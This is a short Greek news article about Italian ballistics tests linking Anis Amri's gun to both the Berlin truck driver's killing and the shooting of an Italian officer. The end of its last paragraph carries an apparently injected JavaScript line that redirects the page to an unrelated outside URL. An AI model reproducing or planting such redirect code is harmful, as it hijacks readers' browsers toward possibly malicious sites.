Μακελάρης Βερολίνου: Με το ίδιο όπλο σκότωσε τον Πολωνό οδηγό και πυροβόλησε τους Ιταλούς αστυνομικούς

0
0

 

Έπειτα από έρευνα της ιταλικής αστυνομίας που συνέκρινε τους κάλυκες των σφαιρών που βρέθηκαν στο Βερολίνο και στο Σέστο Σαν Τζοβάνι, στο βόρειο Μιλάνο, διαπιστώθηκε ότι το όπλο που χρησιμοποίησε στην Ιταλία ο Άνις Άμρι,  είναι αυτό με το οποίο σκότωσε τον Πολωνό οδηγό του φορτηγού που χρησιμοποιήθηκε στην επίθεση.

Ο 24χρονος Τυνήσιος, που διέσχισε την Ευρώπη έχοντας στην κατοχή του το όπλο αυτό μετά την τρομοκρατική επίθεση στο Βερολίνο, τραυμάτισε στον ώμο τον Ιταλό αστυνομικό για να πέσει λίγη ώρα μετά νεκρός από τα πυρά των Ιταλών αστυνομικών.

Η βαλλιστική σύγκριση επέτρεψε στην αστυνομία να καταλήξει με βεβαιότητα στο συμπέρασμα ότι το όπλο που χρησιμοποιήθηκε για να τραυματίσει τον Ιταλό αστυνομικό ήταν το ίδιο με αυτό που σκότωσε τον Πολωνό οδηγό λίγες ημέρες νωρίτερα.

Πλέον οι Ιταλοί ειδικοί που είναι σε επαφή με Γερμανούς ερευνητές ερευνούν αν το ίδιο όπλο χρησιμοποιήθηκε και για τη διάπραξη άλλων εγκλημάτων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here